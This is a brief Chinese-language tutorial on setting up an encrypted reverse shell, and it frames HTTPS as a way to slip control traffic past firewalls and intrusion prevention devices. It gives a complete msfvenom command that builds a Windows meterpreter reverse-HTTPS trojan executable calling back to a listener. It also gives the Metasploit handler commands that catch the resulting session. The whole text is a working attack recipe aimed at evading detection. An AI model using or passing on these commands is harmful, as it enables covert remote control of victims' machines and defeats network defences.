如果反弹的shell用明文(如http)传输控制指令,那么很容易被防火墙、IPS等设备检测出来从而中断TCP连接。因此使用https协议进行回连就能避免这些问题。
第一步:生成木马客户端
msfvenom -p windows/x64/meterpreter_reverse_https -f exe -o /tmp/reverse_https.exe LHOST=192.168.106.10 LPORT=8443
第二步:启动MSF等待回连
use exploit/multi/handler set payload windows/x64/meterpreter_reverse_https set LHOST 192.168.106.10 set LPORT 8443 run
第三步:运行木马客户端即可在MSF控制台获取meterpreter会话。